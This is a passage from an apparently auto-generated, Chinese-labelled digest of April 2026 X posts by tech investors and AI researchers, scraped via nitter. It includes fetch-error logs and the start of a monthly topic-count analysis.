n…\n[原文链接](https://nitter.net/TheChiefNerd/status/2047842000632713369#m)\n\n**[2026-04-24T23:41:01+00:00]**\n> RT by @DavidSacks: David Sacks: We're lucky that Trump's the President when this AI revolution is happening. @Jason \"Do an alt history, Sacks, what would happen if Kamala Ding Dong was in right now?\"…\n[原文链接](https://nitter.net/jayplemons/status/2047823154655932696#m)\n\n**[2026-04-24T22:41:49+00:00]**\n> RT by @DavidSacks: POD UP! Core four is back 🚨 Big show: -- SpaceX-Cursor deal, using compute as leverage -- SaaS debt bomb coming to PE?, venture debt risk -- Software bloodbath, buy low potential? …\n[原文链接](https://nitter.net/theallinpod/status/2047808256047821141#m)\n\n**[2026-04-24T16:41:47+00:00]**\n> R to @DavidSacks: UPDATE: the DOJ has joined @xAI’s lawsuit against Colorado on First Amendment grounds. AI models should not be required to alter truthful output to comply with DEI.\n[原文链接](https://nitter.net/DavidSacks/status/2047717649849659586#m)\n\n**[2026-04-24T15:43:39+00:00]**\n> RT by @DavidSacks: David Sacks on Anthropic-Pentagon dispute, Musk-Altman feud and SpaceX-Cursor deal: https://cnb.cx/4d3HAKp\n[原文链接](https://nitter.net/SquawkCNBC/status/2047703023690924289#m)\n\n**[2026-04-24T15:10:25+00:00]**\n> RT by @DavidSacks: .@DavidSacks: \"We know that @AnthropicAI makes good products. They are smart people, there’s no question about it... we don’t care what their personal views are. What we care about…\n[原文链接](https://nitter.net/RapidResponse47/status/2047694657107165519#m)\n\n**[2026-04-24T13:41:49+00:00]**\n> R to @DavidSacks: Full article: https://www.wsj.com/lifestyle/careers/are-college-graduates-finally-catching-a-break-in-this-job-market-38c37541?st=fxk6Dg&reflink=article_copyURL_share\n[原文链接](https://nitter.net/DavidSacks/status/2047672359377588241#m)\n\n**[2026-04-24T13:39:13+00:00]**\n> Narrative violation: Hiring of new college graduates is up 5.6% over last year. Youth unemployment for degreed 20–24‑year‑olds fell to 5.3% from 8.9%. Weren’t we told that 50% of entry-level jobs wer…\n[原文链接](https://nitter.net/DavidSacks/status/2047671706660073767#m)\n\n**[2026-04-23T00:04:16+00:00]**\n> R to @DavidSacks: Full article: https://www.foxnews.com/politics/anthropics-moral-compass-architect-suggested-ai-overcorrection-could-address-historical-injustices\n[原文链接](https://nitter.net/DavidSacks/status/2047104229773279572#m)\n\n**[2026-04-23T00:03:16+00:00]**\n> Reverse discrimination does not undo historical injustices but rather perpetrates new ones against a different set of individuals. This foments social strife and undermines the ideal of America as a …\n[原文链接](https://nitter.net/DavidSacks/status/2047103978979119580#m)\n\n**[2026-04-21T16:50:07+00:00]**\n> RT by @DavidSacks: This is insane… The Virginia redistricting amendment on the ballot today is framed as a vote to \"restore fairness in the upcoming elections.\" In reality, it turns a state that Kama…\n[原文链接](https://nitter.net/Geiger_Capital/status/2046632586735243420#m)\n\n---\n\n### ✅ @jason — Jason Calacanis(19 条)\n\n**[2026-04-27T15:03:32+00:00]**\n> Best accounts for following Austin air quality? @grok\n[原文链接](https://nitter.net/Jason/status/2048780089295302690#m)\n\n**[2026-04-27T01:51:02+00:00]**\n> Incredible writing from @euphoriaHBO\n[原文链接](https://nitter.net/Jason/status/2048580651985604783#m)\n\n**[2026-04-26T19:42:30+00:00]**\n> I’ve invested in 700 private companies Providing liquidity and loans to high performing founders is completely standard. In fact, investors encourage loans and secondary sales for founders to enable …\n[原文链接](https://nitter.net/Jason/status/2048487905543237675#m)\n\n**[2026-04-26T18:14:04+00:00]**\n> Ok @Acosta, balls in your court\n[原文链接](https://nitter.net/Jason/status/2048465651723882972#m)\n\n**[2026-04-26T18:05:09+00:00]**\n> The NYTimes focus last week was micro-looting, social murder and meaningless private company transactions designed to ferment class warfare. Disgraziad\n[原文链接](https://nitter.net/Jason/status/2048463405590225173#m)\n\n**[2026-04-26T17:13:01+00:00]**\n> Who made this?!\n[原文链接](https://nitter.net/Jason/status/2048450286902235560#m)\n\n**[2026-04-26T16:21:34+00:00]**\n> I’m proud to announce I’m hosting an exhibition cage match between @Acosta and @mtracey on July 4th $100,000 cash prize Vegas 3, 3 minute rounds\n[原文链接](https://nitter.net/Jason/status/2048437340218044499#m)\n\n**[2026-04-26T16:16:34+00:00]**\n> Once again, the substack party result in a Donnybrook — it’s like the source awards for wordmaxxers\n[原文链接](https://nitter.net/Jason/status/2048436081725464959#m)\n\n**[2026-04-26T13:51:54+00:00]**\n> RT by @Jason: Random pic of @Jason protecting our $TAO bags\n[原文链接](https://nitter.net/nordin_eth/status/2048399674269213067#m)\n\n**[2026-04-26T03:57:07+00:00]**\n> The left has a serious violence problem, which @DavidSacks called out early and often. This generation of woke democratic socialists are morally bankrupt. They believe in looting and violence as a po…\n[原文链接](https://nitter.net/Jason/status/2048249992163242220#m)\n\n**[2026-04-26T03:46:17+00:00]**\n> If you’re not condemning these lunatics, you’re advocating for the end of the American empire. I’m not for canceling people, but the fact the @nytimes and @newyorker not only employees these individu…\n[原文链接](https://nitter.net/Jason/status/2048247267182658004#m)\n\n**[2026-04-26T03:40:08+00:00]**\n> Heroes 🫡\n[原文链接](https://nitter.net/Jason/status/2048245718171648271#m)\n\n**[2026-04-25T21:25:29+00:00]**\n> x.com/i/spaces/1nGeLyjZrkvKX\n[原文链接](https://nitter.net/Jason/status/2048151434928017429#m)\n\n**[2026-04-25T19:06:45+00:00]**\n> nightmare blunt rotation\n[原文链接](https://nitter.net/Jason/status/2048116521436590260#m)\n\n**[2026-04-25T19:06:07+00:00]**\n> today #knicks @mikal_bridges to 6th man/leads the bench in scoring Knicks play @23savage____ 26 minutes, he has 5 offensive boards We're up 20+ points in the second half @ATLHawks backs broken; they …\n[原文链接](https://nitter.net/Jason/status/2048116362766127514#m)\n\n**[2026-04-25T17:57:08+00:00]**\n> RT by @Jason: AngelList introduced USVC: venture investing for non-accredited investors starting at $500. Hear why Jason thinks the social media criticisms lack merit and says: \"More liquidity for in…\n[原文链接](https://nitter.net/twistartups/status/2048099001782985057#m)\n\n**[2026-04-25T15:11:10+00:00]**\n> RT by @Jason: The future of coding isn't reading lines of code. It's specifying outcomes and getting binaries back. Elon said it. Aravind from Perplexity agrees. And startups are already making it a …\n[原文链接](https://nitter.net/twistartups/status/2048057234865693125#m)\n\n**[2026-04-25T02:02:48+00:00]**\n> WTF are these lunatics up to…\n[原文链接](https://nitter.net/Jason/status/2047858837319774540#m)\n\n**[2026-04-24T23:01:04+00:00]**\n> RT by @Jason: Planning an event usually means juggling dozens of vendors, scattered payments, and zero visibility. It's a logistical mess. LAMAT is fixing the chaos. It's a marketplace that lets orga…\n[原文链接](https://nitter.net/LAUNCH/status/2047813100091449428#m)\n\n---\n\n### ✅ @HarryStebbings — Harry Stebbings(19 条)\n\n**[2026-04-27T14:02:33+00:00]**\n> Adam Foroughi is by far one of the best CEOs I have ever interviewed. Candidly he is insanely stern and cold but also obsessive, focused and utterly brilliant. With Adam there is zero fluff, like non…\n[原文链接](https://nitter.net/HarryStebbings/status/2048764741435179442#m)\n\n**[2026-04-27T14:02:33+00:00]**\n> R to @HarryStebbings: Spotify https://open.spotify.com/episode/5KPihKzCMKY2DnPeuSxXZ5 Apple Podcasts https://podcasts.apple.com/us/podcast/20vc-applovin-%24160bn-market-cap-%245-48bn-revenue-%2410m/i…\n[原文链接](https://nitter.net/HarryStebbings/status/2048764743205134644#m)\n\n**[2026-04-27T13:30:16+00:00]**\n> Two areas I would love to invest that are non-technical: 1. Egg freezing clinics. In 10 years, strongly believe every 21 year old will freeze their eggs and it becomes the norm. Amazing business. Ins…\n[原文链接](https://nitter.net/HarryStebbings/status/2048756619622707452#m)\n\n**[2026-04-26T22:34:46+00:00]**\n> We hired someone for the investing team. Something I never planned to do. They sent the team 3 new deals per day for 90 days straight. All aligned to our stage, geography and deal type. That’s how yo…\n[原文链接](https://nitter.net/HarryStebbings/status/2048531257399664920#m)\n\n**[2026-04-26T19:35:39+00:00]**\n> I have interviewed 1,000 of the best CEOs of the last 10 years. Adam Foroughi, Founder @AppLovin is easily top 3, ever. $160BN Market Cap $5.48BN Revenue $10M EBITDA per head 82%+ margins Just 450 pe…\n[原文链接](https://nitter.net/HarryStebbings/status/2048486182904852537#m)\n\n**[2026-04-26T15:07:55+00:00]**\n> Seeing two types of founders emerge in this moment: The tourists and the terminators. The terminators are salivating at the opportunity ahead. Hungrier than ever. More ambitious than ever. They want …\n[原文链接](https://nitter.net/HarryStebbings/status/2048418806867870115#m)\n\n**[2026-04-26T13:56:31+00:00]**\n> The best founders I know all text their investors. None of them email them. The relationship will blossom and deepen in a matter of messages.\n[原文链接](https://nitter.net/HarryStebbings/status/2048400836024283246#m)\n\n**[2026-04-24T21:38:00+00:00]**\n> This week I got to sit down with two truly generational CEOs and ask them anything: @tobi @Shopify ($160BN Market Cap) Adam Foroughi @AppLovin ($160BN Market Cap) I have the best job in the world.\n[原文链接](https://nitter.net/HarryStebbings/status/2047792195868967172#m)\n\n**[2026-04-24T15:04:00+00:00]**\n> How Claude Design Will Hurt Figma \"Claude Design will not replace Figma directly, but it will chip away at it. It removes the need to wait for designers by letting people go straight from idea to pro…\n[原文链接](https://nitter.net/HarryStebbings/status/2047693043080261672#m)\n\n**[2026-04-23T23:43:00+00:00]**\n> Why the biggest fintech players are in for a shock. \"The shift is from human UX to agent UX. In the past, you won with dashboards, design and user experience. Now, the buyer is an AI agent, and it on…\n[原文链接](https://nitter.net/HarryStebbings/status/2047461264998478113#m)\n\n**[2026-04-23T21:23:00+00:00]**\n> I used to think MAUs and WAUs were the dumbest metric. Now I think it's the most important. \"I used to think MAUs and WAUs did not matter, now I think they are critical. In the AI era, usage is the l…\n[原文链接](https://nitter.net/HarryStebbings/status/2047426032840634830#m)\n\n**[2026-04-23T20:32:21+00:00]**\n> Slightly soppy bromance post but Jason believed in me when I was 18 and at law school still. There were next to no signs 20VC was or would be a success. He has been a dear friend ever since!\n[原文链接](https://nitter.net/HarryStebbings/status/2047413285675290984#m)\n\n**[2026-04-23T17:48:00+00:00]**\n> Does the $60BN Cursor Deal Make Sense: \"It actually makes sense when you look at what each side lacks. One has explosive revenue but weak margins due to compute and model costs. The other has massive…\n[原文链接](https://nitter.net/HarryStebbings/status/2047371926335857036#m)\n\n**[2026-04-23T16:53:42+00:00]**\n> It is a very expensive desire to be a value investor today. It is much easier to be a momentum investor, that is for sure.\n[原文链接](https://nitter.net/HarryStebbings/status/2047358263868436791#m)\n\n**[2026-04-23T14:06:50+00:00]**\n> This is the big f**king deal. Cursor acquired for $60BN by xAI I sat down with @jasonlk and @rodriscoll to discuss the deal, along with the biggest news in tech this week: - Anthropic Hits $1TRN in S…\n[原文链接](https://nitter.net/HarryStebbings/status/2047316267858645088#m)\n\n**[2026-04-23T14:06:50+00:00]**\n> R to @HarryStebbings: Spotify 👉 https://open.spotify.com/episode/6EjWkbt83H2WXhDMjjS7PF Youtube 👉 https://youtu.be/s61XVZAt5ns Apple Podcasts 👉 https://podcasts.apple.com/us/podcast/20vc-cursor-acqui…\n[原文链接](https://nitter.net/HarryStebbings/status/2047316269465006363#m)\n\n**[2026-04-22T13:07:07+00:00]**\n> I have interviewed 1,000 founders over 10 years. If I could only invest in five, this would be them: 1. Nik Storonsky (Revolut) 2. @alanchanguk (Fuse Energy) 3. Adam Foroughi (AppLovin) 4. @awxjack (…\n[原文链接](https://nitter.net/HarryStebbings/status/2046938853445959738#m)\n\n**[2026-04-21T20:17:56+00:00]**\n> I have interviewed 1,000 CEOs of the largest companies over the last 10 years. Adam Foroughi is top 5 I have ever met. Easily. AppLovin Market Cap: $160BN Revenue: $5.48BN EBITDA per Head: $10M There…\n[原文链接](https://nitter.net/HarryStebbings/status/2046684883494600911#m)\n\n**[2026-04-21T15:37:00+00:00]**\n> In a world of agents, how do software providers prevent themselves from becoming valueless databases? \"The value proposition has to be: 1. How good are your APIs? 2. How well designed are they 3. Are…\n[原文链接](https://nitter.net/HarryStebbings/status/2046614183513604299#m)\n\n---\n\n### ⚠️ @lmsqueegie — Lars Nielsen(获取失败)\n\n- 错误: nitter=URLError: ; snscrape=snscrape_unavailable: No module named 'snscrape'; rsshub=HTTPError: HTTP Error 503: Service Unavailable\n\n### ✅ @david__tian — David Tian(0 条)\n\n---\n\n### ⚠️ @Bitking_ — BTCKing(获取失败)\n\n- 错误: nitter=URLError: ; snscrape=snscrape_unavailable: No module named 'snscrape'; rsshub=HTTPError: HTTP Error 503: Service Unavailable\n\n### ✅ @CryptoCred — Credible Crypto(1 条)\n\n**[2026-04-22T22:25:51+00:00]**\n> Dev is posting about price\n[原文链接](https://nitter.net/CryptoCred/status/2047079463750377958#m)\n\n---\n\n### ✅ @AltcoinBuzz — Altcoin Buzz(0 条)\n\n---\n\n### ✅ @TradingGods — Trading Gods(0 条)\n\n---\n\n### ✅ @Warrior_Trading — Warrior Trading(0 条)\n\n---\n\n### ✅ @ProfTrading — Profitable Trading(0 条)\n\n---\n\n### ✅ @SatoshiBun — Satoshi(12 条)\n\n**[2026-04-25T15:26:45+00:00]**\n> RT by @satoshibun: Another big reason why I don’t necessarily agree with changing the base designs, I think they’re perfect for a medium budget kids cartoon, Qwel’s new art style making them look mor…\n[原文链接](https://nitter.net/images_i_love3/status/2048061157685010444#m)\n\n**[2026-04-24T18:45:53+00:00]**\n> RT by @satoshibun: Baby’s first con\n[原文链接](https://nitter.net/Aaron_Margolin/status/2047748882952778044#m)\n\n**[2026-04-24T17:05:22+00:00]**\n> RT by @satoshibun: Bring home a bundle of cuteness with the #tokidoki Baby Unicorno Series! 🦄🍼💖 Available on our website!\n[原文链接](https://nitter.net/tokidoki/status/2047723587528782152#m)\n\n**[2026-04-24T16:16:22+00:00]**\n> RT by @satoshibun: Good morning! Rise and shine, gamers!\n[原文链接](https://nitter.net/shopculturefly/status/2047711254379393160#m)\n\n**[2026-04-24T11:40:30+00:00]**\n> Im genuinely this Close to killing myself rn & this Shit happens like Okay\n[原文链接](https://nitter.net/satoshibun/status/2047641832624893993#m)\n\n**[2026-04-24T11:06:42+00:00]**\n> RT by @satoshibun: How do Delilah Defenders actively defend her actions with these Toons literally existing. I just don't get it\n[原文链接](https://nitter.net/DaCapTainXD/status/2047633324676440561#m)\n\n**[2026-04-24T09:21:13+00:00]**\n> RT by @satoshibun: 😾\n[原文链接](https://nitter.net/aaa___kanato/status/2047606779677376714#m)\n\n**[2026-04-24T08:00:10+00:00]**\n> RT by @satoshibun: ♦️━━━━━━━━━━━━━♣️ ⠀⠀⠀⠀⠀⠀⠀『#文字化化』 ⠀「不思議の国のアリス」テーマ ⠀グラフアート新商品発売決定! ♠️━━━━━━━━━━━━━♥️ 📅5/23~6/5 📍eeo Store 池袋本店 🛒通販でも販売開始!:https://eeo.today/store/101/title/6785?utm_source=twitter&ut…\n[原文链接](https://nitter.net/eeo_store/status/2047586383519531500#m)\n\n**[2026-04-23T18:56:53+00:00]**\n> RT by @satoshibun: Shadow Milk Cookie’s Mind Blown Jester\n[原文链接](https://nitter.net/breadstickz1/status/2047389262253855041#m)\n\n**[2026-04-23T14:42:44+00:00]**\n> RT by @satoshibun: OH MYG GDOODOISU #moeoverload 🥹\n[原文链接](https://nitter.net/cuckuke/status/2047325302771061148#m)\n\n**[2026-04-22T19:09:40+00:00]**\n> RT by @satoshibun: old pvsm\n[原文链接](https://nitter.net/ricemoochie/status/2047030091293889009#m)\n\n**[2026-04-22T02:03:48+00:00]**\n> RT by @satoshibun: they're about to start making out\n[原文链接](https://nitter.net/savanaclavv/status/2046771924064186549#m)\n\n---\n\n### ⚠️ @直播带逛Tommy — Tommy(获取失败)\n\n- 错误: invalid_handle_for_nitter\n\n### ✅ @AndrewYNg — Andrew Ng(0 条)\n\n---\n\n### ✅ @JeffDean — Jeff Dean(12 条)\n\n**[2026-04-27T13:40:08+00:00]**\n> The video of my conversation with Amin Vahdat, @gilbert, and @djrosent at Cloud Next last week is now up. https://youtu.be/BpnJYJmbXcM?si=vUY3hI_aDX8K6gco Thanks for a great conversation!\n[原文链接](https://nitter.net/JeffDean/status/2048759102390899142#m)\n\n**[2026-04-26T10:41:25+00:00]**\n> RT by @JeffDean: THE FIRST MAN IN HISTORY TO BREAK 2 HOURS IN A MARATHON!!!🤯🤯🤯 Sabastian Sawe 🇰🇪 has just shattered the World Record at the London Marathon, running 1:59:30!!! He makes history as the…\n[原文链接](https://nitter.net/TrackGazette/status/2048351736037826877#m)\n\n**[2026-04-24T13:12:52+00:00]**\n> R to @JeffDean: The Arxiv for the new Decoupled DiLoCo paper is now up: https://arxiv.org/abs/2604.21428v1\n[原文链接](https://nitter.net/JeffDean/status/2047665074471387456#m)\n\n**[2026-04-23T20:15:06+00:00]**\n> R to @JeffDean: It's worth pointing out that we have been pushing on large-scale training and asynchronous techniques for the last ~14 years. Here's our NeurIPS 2012 paper where we demonstrated that …\n[原文链接](https://nitter.net/JeffDean/status/2047408945950802186#m)\n\n**[2026-04-23T20:09:30+00:00]**\n> R to @JeffDean: TPU 8i is co-designed with our Gemini research team to support low latency inference. Among the attributes that support this are large amounts of on-chip SRAM, enabling more computati…\n[原文链接](https://nitter.net/JeffDean/status/2047407537566495033#m)\n\n**[2026-04-23T20:00:58+00:00]**\n> R to @JeffDean: First, let's talk about TPU 8t, which is designed for large-scale training and inference throughput. The pod size is increased slightly to 9600 chips, and provides ~3X the FP4 perform…\n[原文链接](https://nitter.net/JeffDean/status/2047405389856297387#m)\n\n**[2026-04-23T19:55:08+00:00]**\n> I had a good time discussing yesterday's Google TPU v8t and v8i announcement at Cloud Next with Amin Vahdat along with @AcquiredFM hosts @gilbert and @djrosent. The blog post announcement has lots of…\n[原文链接](https://nitter.net/JeffDean/status/2047403921912873257#m)\n\n**[2026-04-23T15:41:07+00:00]**\n> It's been a delight to provide small amounts of advice and suggestions to people working on the Decoupled DiLoCo training system. This approach enables graceful handling of failures in large scale tr…\n[原文链接](https://nitter.net/JeffDean/status/2047339995682529313#m)\n\n**[2026-04-21T19:31:28+00:00]**\n> RT by @JeffDean: My friend @JeffDean encouraged me to speak at this event so come join me on May 26 in San Jose! https://bauplanlabs.github.io/SAO-workshop/\n[原文链接](https://nitter.net/ceo_clickhouse/status/2046673188193701901#m)\n\n**[2026-04-21T17:02:26+00:00]**\n> RT by @JeffDean: The future of computer vision is agentic. 1/ We built Nomadic around a gap we kept seeing in video understanding: VLMs generate chain-of-thought that's fluent and often correct in st…\n[原文链接](https://nitter.net/nomadicai/status/2046635685206208533#m)\n\n**[2026-04-21T16:50:26+00:00]**\n> RT by @JeffDean: Following positive feedback from other venues, like STOC and ICML, NeurIPS is pleased to announce a new initiative in partnership with Google: for NeurIPS 2026, authors will have acc…\n[原文链接](https://nitter.net/NeurIPSConf/status/2046632664493384060#m)\n\n**[2026-04-20T21:46:52+00:00]**\n> RT by @JeffDean: Read how Google built custom silicon and infrastructure - and how it's benefiting customers today - in the latest from @Bloomberg. We'll share more updates this week at #GoogleCloudN…\n[原文链接](https://nitter.net/ThomasOrTK/status/2046344875994739028#m)\n\n---\n\n### ✅ @soumithchintala — Soumith Chintala(4 条)\n\n**[2026-04-27T13:29:14+00:00]**\n> This is kinda interesting. Anthro probably needs to scale up Account Support via Claude or via humans (traditional account managers). Would be funny if they chose humans. Alternatively, more and more…\n[原文链接](https://nitter.net/soumithchintala/status/2048756358820827564#m)\n\n**[2026-04-23T05:52:02+00:00]**\n> RT by @soumithchintala: Incredible work by Sony published in @Nature today! 🏓 They’ve built “Ace”, an autonomous ping-pong robot that uses RL and Sony’s vision sensors to achieve expert-level play in…\n[原文链接](https://nitter.net/hardmaru/status/2047191747793649805#m)\n\n**[2026-04-20T17:40:46+00:00]**\n> RT by @soumithchintala: Dwarkesh is not an AGI party bro. He's been pretty diverse in how he seeks alpha from across a wide variety of industries. I enjoy the hell out of a lot of his podcasts. This …\n[原文链接](https://nitter.net/soumithchintala/status/2046282944139215141#m)\n\n**[2026-04-20T16:32:46+00:00]**\n> The Jensen + @dwarkesh_sp podcast was fantastic. Jensen is someone who understood how ecosystems work and someone who understands real-world trade, policy and controls work. And in some deeper sense …\n[原文链接](https://nitter.net/soumithchintala/status/2046265830908870983#m)\n\n---\n\n### ⚠️ @MikeAI — Michael(获取失败)\n\n- 错误: nitter=URLError: ; snscrape=snscrape_unavailable: No module named 'snscrape'; rsshub=HTTPError: HTTP Error 503: Service Unavailable\n\n### ✅ @Ronald_vanLoon — Ronald van Loon(20 条)\n\n**[2026-04-27T15:23:07+00:00]**\n> Faster Than Human Reflexes: A #Robotic Hand Redefining Speed and Precision by @sciencegirl #Robotics #Engineering #ArtificialIntelligence #Innovation #Technology\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048785019083128974#m)\n\n**[2026-04-27T15:00:27+00:00]**\n> R to @Ronald_vanLoon: Here’s the bottom line: AI won’t be won by who moves fastest. It’ll be won by who governs best. If your data isn’t structured, contextualized, and controlled, scaling AI will on…\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048779312854118829#m)\n\n**[2026-04-27T15:00:26+00:00]**\n> R to @Ronald_vanLoon: The real bottleneck isn’t models. It’s unstructured data. I saw a side-by-side demo that made this obvious: → Raw data environment • lower accuracy • higher risk • inefficient o…\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048779308794077361#m)\n\n**[2026-04-27T15:00:25+00:00]**\n> R to @Ronald_vanLoon: The biggest misconception? Speed = progress. In reality: → Teams are innovating faster than they can govern → Outputs are inconsistent and hard to trust → Risk is increasing qui…\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048779304683581558#m)\n\n**[2026-04-27T15:00:24+00:00]**\n> Pinned: Everyone thinks they’re scaling AI. Most are just scaling chaos. What I’m seeing, including in conversations with @collibra, is a dangerous illusion → faster experimentation → more pilots → z…\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048779299574911274#m)\n\n**[2026-04-27T14:23:11+00:00]**\n> #AI Referees the Sand: Real-Time Beach Volleyball Analysis — Enhancing the Game or Changing Its Soul? by @measure_plan #ArtificialIntelligence #MachineLearning #ML\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048769934587523460#m)\n\n**[2026-04-27T13:45:07+00:00]**\n> How poor #Data foundations can undermine #AI success by Joanne Carew @CIOonline Learn more: https://bit.ly/4cGbKSG #MachineLearning #ArtificialIntelligence #DeepLearning #ML\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048760355367604358#m)\n\n**[2026-04-27T13:11:07+00:00]**\n> Dual-Arm Tracked Humanoid Begins Real-World Industrial Trials via @IlirAliu_ #Robotics #ArtificialIntelligence #ML #Innovation #Technology\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048751798735835629#m)\n\n**[2026-04-27T13:00:20+00:00]**\n> R to @Ronald_vanLoon: My view is simple: The winners in enterprise AI will not be the companies with access to the most models. They will be the ones that build the best intelligent systems around th…\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048749087323820198#m)\n\n**[2026-04-27T13:00:20+00:00]**\n> R to @Ronald_vanLoon: The second misconception I keep seeing: Too many teams think they have to choose between open models and proprietary models. They do not. The smarter path is hybrid. → proprieta…\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048749084446515253#m)\n\n**[2026-04-27T13:00:19+00:00]**\n> R to @Ronald_vanLoon: My biggest takeaway: Models are becoming components, not products. What matters now is the system around them: → runtimes → memory → tool access → orchestration → secure executi…\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048749081464287511#m)\n\n**[2026-04-27T13:00:18+00:00]**\n> Most enterprise AI strategies are already behind. Not because they picked the wrong model, but because they are still thinking at the model layer. The real shift is happening one level up, where AI b…\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048749077911736401#m)\n\n**[2026-04-27T12:50:08+00:00]**\n> Shape-Shifting Wheels by KIMM Let Wheelchairs Climb Stairs and Conquer Any Terrain by @spaceandtech_ #Innovation #EmergingTech #Technology\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048746516324487529#m)\n\n**[2026-04-27T12:18:17+00:00]**\n> AI Q: The Emotion-Reading Humanoid #Robot That Reacts Like a Real Being via @XRoboHub #Robots #ArtificialIntelligence #Innovation #Technology #Tech\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048738501798121537#m)\n\n**[2026-04-27T11:20:17+00:00]**\n> Skild Brain Pairs With Jetson Thor to Power Next-Gen #Robotics Intelligence by @CyberRobooo #Robot #Engineering #Innovation #Technology\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2048723908744954357#m)\n\n**[2026-04-23T07:27:06+00:00]**\n> RT by @Ronald_vanLoon: RIVR Delivery #Robot Sits Down to Drop Packages from the Bottom by @rivr_tech #Robotics #Engineering #ArtificialIntelligence #Innovation #Technology\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2047215673680490894#m)\n\n**[2026-04-23T06:57:05+00:00]**\n> RT by @Ronald_vanLoon: China Deploys Solar #Robot to De-Ice Power Lines in Extreme Mountain Conditions by @IntEngineering #Robotics #Engineering #Innovation #Technology\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2047208118723936306#m)\n\n**[2026-04-23T06:23:14+00:00]**\n> RT by @Ronald_vanLoon: Treventus Scan #Robot Digitizes Up to 2,500 Pages Per Hour by @AadityaAnand_11 #Robotics #Innovation #EmergingTech #Technology\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2047199600872665579#m)\n\n**[2026-04-23T05:50:01+00:00]**\n> RT by @Ronald_vanLoon: 12 #AI Terms to Learn by @Python_Dv #ArtificialIntelligence #MachineLearning #ML #MI\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2047191242535063594#m)\n\n**[2026-04-23T05:27:12+00:00]**\n> RT by @Ronald_vanLoon: Antigravity A1: Redefining Aerial Imaging with 8K 360° Panoramic Vision by @Insta360Japan #EmergingTech #Innovation #TechForGood #Technology\n[原文链接](https://nitter.net/Ronald_vanLoon/status/2047185500134351287#m)\n\n---\n\n### ✅ @erikbryn — Erik Brynjolfsson(6 条)\n\n**[2026-04-25T03:06:05+00:00]**\n> Steve Jurvetson has a knack for seeing the future more clearly than just about anyone. Here are some of his insights from his visit to my Lab. @FutureJurvetson @Stanford @DigEconLab\n[原文链接](https://nitter.net/erikbryn/status/2047874760542200042#m)\n\n**[2026-04-24T23:32:43+00:00]**\n> RT by @erikbryn: Interesting study by @erikbryn and @avi_collis showing big consumer welfare gains from AI. Reminds us that large portion of the economic value of AI will not show up in traditional e…\n[原文链接](https://nitter.net/RonnieChatterji/status/2047821064437424288#m)\n\n**[2026-04-23T18:14:10+00:00]**\n> RT by @erikbryn: Congratulations to Lab Digital Fellow Angela Aristidou, Digital Fellow @avi_collis, and Research Scientist @d_vidnguyen for being a part of @GoogleAI's inaugural group of global econ…\n[原文链接](https://nitter.net/DigEconLab/status/2047378514240999569#m)\n\n**[2026-04-22T01:22:04+00:00]**\n> RT by @erikbryn: Thanks for coming in today, and for sharing your feedback on my team’s idea! Your optimistic take on the value that humans will continue to deliver was so refreshing.\n[原文链接](https://nitter.net/TejuAdeyinka/status/2046761422148018260#m)\n\n**[2026-04-21T21:13:05+00:00]**\n> RT by @erikbryn: How do AI agents influence knowledge work? @SuproteemSarkar's (@UChicago) talk at the DEL Seminar Series is now available on YouTube! Moderated by @erikbryn, Sarkar discusses three p…\n[原文链接](https://nitter.net/DigEconLab/status/2046698761221783753#m)\n\n**[2026-04-21T17:10:57+00:00]**\n> RT by @erikbryn: Excited to speak at my friend @erikbryn’s ECON 295/CS 323 class at @Stanford today. Questions?\n[原文链接](https://nitter.net/saranormous/status/2046637828025835983#m)\n\n---\n\n### ✅ @liuliu — 刘进(3 条)\n\n**[2026-04-24T04:05:41+00:00]**\n> I've been thinking about local LLMs a lot these days.\n[原文链接](https://nitter.net/liuliu/status/2047527371486658814#m)\n\n**[2026-04-23T17:57:10+00:00]**\n> I still think on usability-wise, there is a big gap between \"your thing in the training data\" v.s. \"your thing in the SKILL.md\". Prove me wrong otherwise.\n[原文链接](https://nitter.net/liuliu/status/2047374234004115719#m)\n\n**[2026-04-22T16:16:24+00:00]**\n> Ask Codex about Ulysses attention: wow, you know so much and can help me get this communication+spda thing work! Ask Codex to implement a segmented file downloader: didn’t even get the completion blo…\n[原文链接](https://nitter.net/liuliu/status/2046986486629986435#m)\n\n---\n\n### ⚠️ @二级炒家 — 二级炒家(获取失败)\n\n- 错误: invalid_handle_for_nitter\n\n### ⚠️ @王川 — 王川(获取失败)\n\n- 错误: invalid_handle_for_nitter\n\n### ⚠️ @老胡 — 老胡(获取失败)\n\n- 错误: invalid_handle_for_nitter\n\n### ⚠️ @比特币超级玩家 — 超级玩家(获取失败)\n\n- 错误: invalid_handle_for_nitter\n", + "monthly_analysis_md": "# X平台资讯深度分析报告\n\n**报告日期**: 2026-04-27T15:26:27.149133+00:00\n**分析账号**: 33个 | **活跃账号**: 17个 | **推文总量**: 242条\n\n---\n\n## 一、总体概览\n\n- 本报告基于 X 关注列表近30天 RSS 数据自动生成。\n- 默认口径:按账号聚合、按推文主题词粗分层。\n\n## 二、主题分布\n\n- **其他**:163 条\n- **模型能力**:47 条\n- **投融资与并购**:12 条\n- **交易与市场**:11 条\n- **算力与芯片**:9 条\n\n## 三、活跃账号 Top10\n\n- @Ronald_vanLoon: 20 条\n- @sama: 20 条\n- @paulg: 20 条\n- @eladgil: 20 条\n- @jason: 19 条\n- @GaryMarcus: 19 条\n- @HarryStebbings: 19 条\n- @DavidSacks: 19 条\n- @ylecun: 19 条\n- @elonmusk: 18 条\n\n## 四、代表性推文\n\n- @Ronald_vanLoon | 2026-04-27T15:23:07+00:00\n - Faster Than Human Reflexes: A #Robotic Hand Redefining Speed and Precision by @sciencegirl #Robotics #Engineering #ArtificialIntelligence #Innovation #Technology\n - 